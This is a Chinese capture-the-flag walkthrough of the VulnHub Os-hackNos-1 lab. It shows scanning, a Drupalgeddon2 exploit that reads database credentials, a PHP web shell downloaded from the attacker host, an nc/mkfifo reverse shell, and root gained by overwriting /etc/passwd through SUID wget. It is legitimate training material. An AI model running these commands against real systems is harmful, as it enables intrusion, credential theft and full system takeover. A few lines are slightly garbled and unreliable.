今天带来的靶机是 vulnhub Os-hackNos-1 先看一下简介:
难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt
0.靶机简介:
Difficulty : Easy to Intermediate
Flag : 2 Flag first user And second root
Learning : exploit | Web Application | Enumeration | Privilege Escalation
Website : www.hackNos.com
mail : contact@hackNos.com
靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
1.收集信息
1.1使用nmap对目标进行扫描
root@kali:~# nmap -p- 192.168.0.142 -sV -oA Os-hackNos-1
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 18:51 AKST
Nmap scan report for 192.168.0.142
Host is up (0.011s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 40:A5:EF:46:69:0A (Shenzhen Four Seas Global Link Network Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.66 seconds
1.2 gobuster对目标80端口进行目录扫描
root@kali:~# gobuster dir -u http://192.168.0.142 -w /usr/share/wordlists/dirbuster/directory-
list-2.3-small.txt
===============================================================Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================[+] Url: http://192.168.0.142
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================2019/12/07 18:49:29 Starting gobuster
===============================================================/drupal (Status: 301)
===============================================================2019/12/07 18:50:14 Finished
通过目录扫描发现目标装有drupal 访问目录如图
通过 http://192.168.0.142/drupal/CHANGELOG.txt 得知grupal的版本为 Drupal 7.57
3.对Drupal 7.57进行安全检测
通过一些列技术手段在Drupal 进行安全测试 最终在gitbub
https://github.com/pimps/CVE-2018-7600 找到exp
3.1 查看配置文件收集信息
python3 drupa7-CVE-2018-7600.py http://192.168.0.142/drupal/ -c "cat sites/default/settings.php"
1.$databases = array (
2 'default' =>
3 array (
4 'default' =>
5 array (
6 'database' => 'cuppa',
7 'username' => 'cuppauser',
8 'password' => 'Akrn@4514',
9 'host' => 'localhost',
10 'port' => '',
11 'driver' => 'mysql',
12 'prefix' => '',
13 ),
14 ),
15);
4.反弹shell
4.1通过exp下载 shell文件
python3 drupa7-CVE-2018-7600.py http://192.168.0.142/drupal/ -c "wget 192.168.0.136:8000/mOon.php mOon.php"
mOon内容是
php system($_POST['moon']);?>
4.2 使用burpsuite进行POST提交
通过命令查找nc 是否存在 which nc 存在的情况下 用nc反弹
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+‐i+2>%261|nc+192.168.0.136+9001+>/tmp/f
kali上 执行命令 nc -lvnp 9001
4.3 得到shell
切换python3 shell
python3 ‐c 'import pty;pty.spawn("/bin/bash")'
5.解密文件
5.1 在网站根目录找到可疑文件 alexander.txt
base64解密
1echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 ‐d
得到文件
1+++++ +++++ [‐>++ +++++ +++] >++++ ++.‐‐ ‐‐‐‐‐ ‐‐. ++[‐> +++] >+++.
2.‐‐‐‐‐ ‐‐‐. +++[‐ >+++ ]>+++ ++. +++++ +[‐>‐ ‐‐‐‐‐ ‐]>‐ ‐‐‐‐‐ ‐‐.
3++[‐> +++] >++++ +. +++[‐ >++++ +]>. ++.++ +++++ +.‐‐‐ ‐‐‐. +++[‐
4>+++ ]>+++ +. +++++ [‐>‐‐ ‐‐‐‐‐ ]>‐. [ ‐>‐‐‐ ]>‐‐ ‐.+.‐ ‐‐‐.+
在线解密 https://www.splitbrain.org/services/ook
最后得到账号和密码 james:Hacker@451
6.查找user.txt
6.1 用户登录失败
再进行su操作的时候发现用户 su james登录失败
ssh登录发现用户登录不允许登陆
6.2 得到user.txt flag
cat /etc/passwd
ls /cat/james
cat /etc/james/user.txt
7.特权提升
7.1 通过suid提权 查找特权文件命令
find / ‐perm ‐u=s ‐type f 2>/dev/null
从上图可以看到 wget 是拥有root权限 即可以通过wget 下载可以替换文件。
7.2 替换/etc/passwd
在kali上生成密码
openssl passwd ‐1 ‐salt moonsec 123456
创建文件passwd 把 写入moonsec 为root权限
1.cat /etc/passwd
2.root:x:0:0:root:/root:/bin/bash
3.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4.bin:x:2:2:bin:/bin:/usr/sbin/nologin
5.sys:x:3:3:sys:/dev:/usr/sbin/nologin
6.sync:x:4:65534:sync:/bin:/bin/sync
7.games:x:5:60:games:/usr/games:/usr/sbin/nologin
8.man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
9.lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13.proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14.www‐data:x:33:33:www‐data:/var/www:/usr/sbin/nologin
15.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17.irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18.gnats:x:41:41:Gnats Bug‐Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19.nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20.systemd‐timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
21.systemd‐network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
22.systemd‐resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
23.systemd‐bus‐proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
24.syslog:x:104:108::/home/syslog:/bin/false
25_apt:x:105:65534::/nonexistent:/bin/false
26.lxd:x:106:65534::/var/lib/lxd/:/bin/false
27messagebus:x:107:111::/var/run/dbus:/bin/false
28uuidd:x:108:112::/run/uuidd:/bin/false
29dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
30james:x:1000:1000:james,,,:/home/james:/bin/bash
31sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
32mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
33moonsec:$1$moonsec$Zo8rbBypEa7Gt6vL8qy841:0:0:root:/root:/bin/bash
7.3 替换文件
wget http://192.168.0.136:8000/passwd ‐O /etc/passwd
查看目标上的/etc/passwd 看到文件已经成功替换
7.4 获取root.txt
su moonsec 输入密码获取root权限